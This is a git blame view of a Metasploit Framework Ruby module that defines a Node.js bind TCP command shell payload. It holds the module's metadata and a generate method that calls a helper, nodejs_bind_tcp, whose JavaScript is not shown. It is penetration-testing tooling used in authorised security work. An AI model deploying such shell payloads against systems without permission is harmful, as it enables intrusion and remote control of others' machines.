Files
metasploit-gs/modules/payloads/singles/nodejs/shell_bind_tcp.rb
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

48 lines
1.2 KiB
Ruby
Raw Normal View History

2013-10-07 06:09:21 -05:00
##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
2013-10-07 06:09:21 -05:00
##
# It would be better to have a commonjs payload, but because the implementations
# differ so greatly when it comes to require() paths for net modules, we will
# settle for just getting shells on nodejs.
2016-03-08 14:02:44 +01:00
module MetasploitModule
2013-10-07 06:09:21 -05:00
CachedSize = 555
2013-10-07 06:09:21 -05:00
include Msf::Payload::Single
2013-10-12 03:19:06 -05:00
include Msf::Payload::NodeJS
2013-10-07 06:09:21 -05:00
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'Command Shell, Bind TCP (via nodejs)',
'Description' => 'Creates an interactive shell via nodejs',
'Author' => ['joev'],
'License' => BSD_LICENSE,
'Platform' => 'nodejs',
'Arch' => ARCH_NODEJS,
'Handler' => Msf::Handler::BindTcp,
'Session' => Msf::Sessions::CommandShell,
'PayloadType' => 'nodejs',
'Payload' => { 'Offsets' => {}, 'Payload' => '' }
))
end
#
# Constructs the payload
#
2022-11-04 00:33:03 +00:00
def generate(_opts = {})
2013-10-07 06:09:21 -05:00
super + command_string
end
#
# Returns the JS string to use for execution
#
def command_string
2013-10-12 03:19:06 -05:00
nodejs_bind_tcp
2013-10-07 06:09:21 -05:00
end
end